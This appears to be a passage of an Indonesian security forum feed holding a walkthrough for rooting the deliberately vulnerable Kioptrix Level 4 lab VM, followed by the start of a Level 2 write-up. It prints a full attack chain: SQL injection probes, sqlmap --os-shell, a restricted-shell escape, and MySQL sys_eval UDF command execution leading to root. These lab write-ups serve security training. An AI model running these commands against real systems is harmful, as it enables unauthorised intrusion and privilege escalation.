<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-JFwlAPBWhFI/VuFF2EKFZiI/AAAAAAAAAzA/cSVp_3VjuPI/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://4.bp.blogspot.com/-JFwlAPBWhFI/VuFF2EKFZiI/AAAAAAAAAzA/cSVp_3VjuPI/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Done..</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Untuk video nya bisa disimak disini :</span></span></span><br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/y8DOh9D17Zc" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah sekian tutorial kali ini, semoga bermanfaat.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Share juga ke teman teman mu biar mereka tau. <a href="http://www.linuxsec.org" target="_blank" class="mycode_url"> </a></span></span></span>]]></description>
			<content:encoded><![CDATA[<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Pada kesempatan kali ini saya akan membahas cara mendapatkan root akses pada server Kioptrix Level 4. Pada challenge level ini lumayan susah karena di server nya sudah dilengkapi rule iptables sehingga beberapa command seperti wget dari port 80 di block, dll.Oke langsung saja .</span></span></span><br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Untuk image OracleVM nya download disini :</span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Download Kioptrix Level 4</span></a></span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> </span></span></span></div>
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ini tampilan awal dari webserver Kioptrix Level 4.</span></span></span></div>
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-rPHl22Dve1s/VuE20I5mM-I/AAAAAAAAAws/Af5IV-0UNkI/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-rPHl22Dve1s/VuE20I5mM-I/AAAAAAAAAws/Af5IV-0UNkI/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Saya mencoba melakukan bypass dengan memasukkan user dan password </span></span></span><span style="font-weight: bold;" class="mycode_b"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">'=' 'or'</span></span></span></span><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> tapi ternyata gagal. Berarti emmang tidak bisa di bypass.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Tapi ketika saya masukkan password dan user nya berupa </span></span></span><span style="font-weight: bold;" class="mycode_b"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">'</span></span></span></span><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> ( petik satu ) , saya mendapatkan error.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-L9zwLV1Hchs/VuE3csN5rAI/AAAAAAAAAw0/SIELjY-KrDM/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://1.bp.blogspot.com/-L9zwLV1Hchs/VuE3csN5rAI/AAAAAAAAAw0/SIELjY-KrDM/s320/kioptrix4.png" width="320" height="69" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Yup, kemungkinan vuln sqli.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Saya coba melakukan sqli post data menggunakan sqlmap.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Namun sebelumya saya gunakan live http header untuk meng-capture post di form login tadi.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-ZarNXSbzB8g/VuE36B32t1I/AAAAAAAAAw4/LdJIPipi5So/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://2.bp.blogspot.com/-ZarNXSbzB8g/VuE36B32t1I/AAAAAAAAAw4/LdJIPipi5So/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">sehingga command di sqlmap nya :</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">yuyudhn@linuxsec~&#36; sqlmap -u "http://192.168.43.173/checklogin.php --data="myusername=%27&amp;mypassword=%27&amp;Submit=Login" --dbs</span></span></span><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> .</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Lanjutkan terus sampai menemukan password dan username nya.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://3.bp.blogspot.com/-FDHf48dHbFk/VuE56IYo6jI/AAAAAAAAAxI/wXIGuJB94M8/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://3.bp.blogspot.com/-FDHf48dHbFk/VuE56IYo6jI/AAAAAAAAAxI/wXIGuJB94M8/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ternyata password nya plantext. Saya coba login dengan user john, karena password nya lebih mudah diingat.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Namun ketika saya login ternyata hanya tampilan username dan password saja.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-i1-9VAZoaXA/VuE6PB2tyaI/AAAAAAAAAxM/BXJd14HreDs/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://1.bp.blogspot.com/-i1-9VAZoaXA/VuE6PB2tyaI/AAAAAAAAAxM/BXJd14HreDs/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Karena tidak ada clue lain , kita coba spawn shell via sqlmap.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"> </span></span></span><span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">yuyudhn@linuxsec~&#36; sqlmap -u "http://192.168.43.173/checklogin.php --data="myusername=%27&amp;mypassword=%27&amp;Submit=Login" --os-shell</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-qOzW7IOOZZI/VuE65nDXluI/AAAAAAAAAxY/2fTt0FO5hA4/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://1.bp.blogspot.com/-qOzW7IOOZZI/VuE65nDXluI/AAAAAAAAAxY/2fTt0FO5hA4/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Untuk web server pilih php, direktori nya pilih /var/www , karena kita tadi sudah tahu di awal.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-EfPPxtCaIR0/VuE7U5iERiI/AAAAAAAAAxg/esoaQ4GHp1s/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-EfPPxtCaIR0/VuE7U5iERiI/AAAAAAAAAxg/esoaQ4GHp1s/s320/kioptrix4.png" width="320" height="180" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sekarang kita coba mencari informasi database dengan melihat source checklogin.php .</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">os-shell&gt; cat checklogin.php</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-9Hu5n9r3Fpk/VuE71-5eBpI/AAAAAAAAAxo/ASK_T-CdnS0/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color"><img src="https://4.bp.blogspot.com/-9Hu5n9r3Fpk/VuE71-5eBpI/AAAAAAAAAxo/ASK_T-CdnS0/s320/kioptrix4.png" width="320" height="120" alt="[Image: kioptrix4.png]" class="mycode_img" /></span></a></span></span></span></div>
<br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Oppss... root user without password.</span></span></span><br />
<br />
<br />
===<br />
Lanjut kebawah...<br />
<hr class="mycode_hr" />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita tinggalkan dulu. Sekarang kita coba login ssh dengan user john dan password MyNameIsJohn .</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ternyata masuk.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-vH_WoGQY_ww/VuE_JJeC4AI/AAAAAAAAAx4/Z3YS6bzMyFM/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://2.bp.blogspot.com/-vH_WoGQY_ww/VuE_JJeC4AI/AAAAAAAAAx4/Z3YS6bzMyFM/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Namun ternyata command command nya dibatasi.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Dan setelah googling kesana kemari akhirnya saya tau kalau ini nama nya lshell ( limited shell ) .</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Tapi sepertinya di versi yang terinstall disini masih terdapat bug.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sehingga kita bisa "keluar" dari batasan tadi dengan command :</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">john&#36; echo os.system('/bin/sh')</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ini untuk memanggil bash interpreter.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-BiqOkH_AAHY/VuFAE2NvUAI/AAAAAAAAAyA/7LI9rp4pX0s/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://2.bp.blogspot.com/-BiqOkH_AAHY/VuFAE2NvUAI/AAAAAAAAAyA/7LI9rp4pX0s/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Karena goal akhir adalah mendapatkan hak akses root dengan cara apapun, saya pun mencoba untuk mendapatkan root dengan sudo. Tapi ternyata gagal.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-XA5UFa1FIcs/VuFAtjLugYI/AAAAAAAAAyI/RknJ0lN3OCo/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://1.bp.blogspot.com/-XA5UFa1FIcs/VuFAtjLugYI/AAAAAAAAAyI/RknJ0lN3OCo/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Saya coba login ke mysql dengan root user dan tanpa password. ( di step sebelumnya kita sudah mengetahui kalau root tidak di password )</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">&#36; mysql -u root</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-7oLNQGxZVs4/VuFBqHO-kqI/AAAAAAAAAyQ/OG_SebfLgCw/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://2.bp.blogspot.com/-7oLNQGxZVs4/VuFBqHO-kqI/AAAAAAAAAyQ/OG_SebfLgCw/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah kita tau versi MySQL nya adalah versi 5 dimana disini mendukung command untuk memanggil perintah eksternal lewat mysql pengunakan plugins mysqludf.</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt; quit</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">&#36; whereis lib_mysqludf_sys.so</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://2.bp.blogspot.com/-SvTvxm-eCTQ/VuFDBgt329I/AAAAAAAAAyc/fCJir2oxDiI/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://2.bp.blogspot.com/-SvTvxm-eCTQ/VuFDBgt329I/AAAAAAAAAyc/fCJir2oxDiI/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nice, ternyata kioptrix sudah menyediakannya untuk kita sehingga kita tidak perlu mendownloadnya.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kita masuk lagi ke mysql dan masuk ke salahsatu database.</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-E56setESee0/VuFDtpsfWZI/AAAAAAAAAyk/3t3whm3Bywc/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://4.bp.blogspot.com/-E56setESee0/VuFDtpsfWZI/AAAAAAAAAyk/3t3whm3Bywc/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Namun ketika saya memasukkan command :</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt; select sys_eval('id');</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Ternyata mendapat error karena module nya tidak ada.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sekarang masukkan command :</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt; create function sys_eval returns string soname 'lib_mysqludf_sys.so';</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-Mf7JUmGbsuo/VuFEnYELkuI/AAAAAAAAAys/pZrAuX1tb0M/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://1.bp.blogspot.com/-Mf7JUmGbsuo/VuFEnYELkuI/AAAAAAAAAys/pZrAuX1tb0M/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">root...</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Sebenarnya karena goal dari Kioptrix adalah mendapat root, kita sudah selesai disini.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Tapi saya coba untuk mengangkat user john menjadi sudoers.</span></span></span><br />
<span style="color: red;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt; select sys_eval('usermod -a -G admin john');</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://1.bp.blogspot.com/-sTdzKate2FE/VuFFL0Gmf1I/AAAAAAAAAy0/A6yEsLznIpQ/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://1.bp.blogspot.com/-sTdzKate2FE/VuFFL0Gmf1I/AAAAAAAAAy0/A6yEsLznIpQ/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">mysql&gt;exit</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">&#36; sudo su</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">root@Kioptrix4:/home/john# id</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">uid=0(root) gid=0(root) groups=0(root)</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">root@Kioptrix4:/home/john# whoami</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">root</span></span></span><br />
<div style="text-align: center;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="https://4.bp.blogspot.com/-JFwlAPBWhFI/VuFF2EKFZiI/AAAAAAAAAzA/cSVp_3VjuPI/s1600/kioptrix4.png" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">[img=320x0]https://4.bp.blogspot.com/-JFwlAPBWhFI/VuFF2EKFZiI/AAAAAAAAAzA/cSVp_3VjuPI/s320/kioptrix4.png[/img]</span></a></span></span></span></div>
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Done..</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Untuk video nya bisa disimak disini :</span></span></span><br />
<!-- start: video_youtube_embed --><br />
<iframe width="560" height="315" src="//www.youtube.com/embed/y8DOh9D17Zc" frameborder="0" allowfullscreen></iframe><br />
<!-- end: video_youtube_embed --><br />
<br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Nah sekian tutorial kali ini, semoga bermanfaat.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Share juga ke teman teman mu biar mereka tau. <a href="http://www.linuxsec.org" target="_blank" class="mycode_url"> </a></span></span></span>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Kioptrix Level 2 - Command Injection and Server Rooting]]></title>
			<link>https://www.backboxindonesia.or.id/thread-3.html</link>
			<pubDate>Wed, 09 Mar 2016 02:27:12 +0000</pubDate>
			<guid isPermaLink="false">https://www.backboxindonesia.or.id/thread-3.html</guid>
			<description><![CDATA[<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Kali ini saya akan menulis pembahasan dari Kioptrix Level 2 Challenge. Kioptrix sendiri adalah Oracle VM Image yang dirancang khusus untuk mendalami dasar dasar dari keamanan website dan jaringan. Jadi OS nya memang didesain vulnerable. Goal dari challenge Kioptrix sendiri adalah mendapatkan root access dari OS tadi, bagaimanapun cara nya. Sehingga kita bebas untuk masuk melalui celah apapun yang terbuka.</span></span></span><br />
<span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font">Oke langsung saja ya.</span></span></span><br />
<div style="text-align: justify;" class="mycode_align"><span style="color: #000000;" class="mycode_color"><span style="font-size: small;" class="mycode_size"><span style="font-family: Arial, Tahoma, Helvetica, FreeSans, sans-serif;" class="mycode_font"><a href="http://www.kioptrix.com/dlvm/Kioptrix_Level_2.rar" target="_blank" class="mycode_url"><span style="color: #4d469c;" class="mycode_color">Download Kioptrix Level 2</span></a></span></span></span></div>
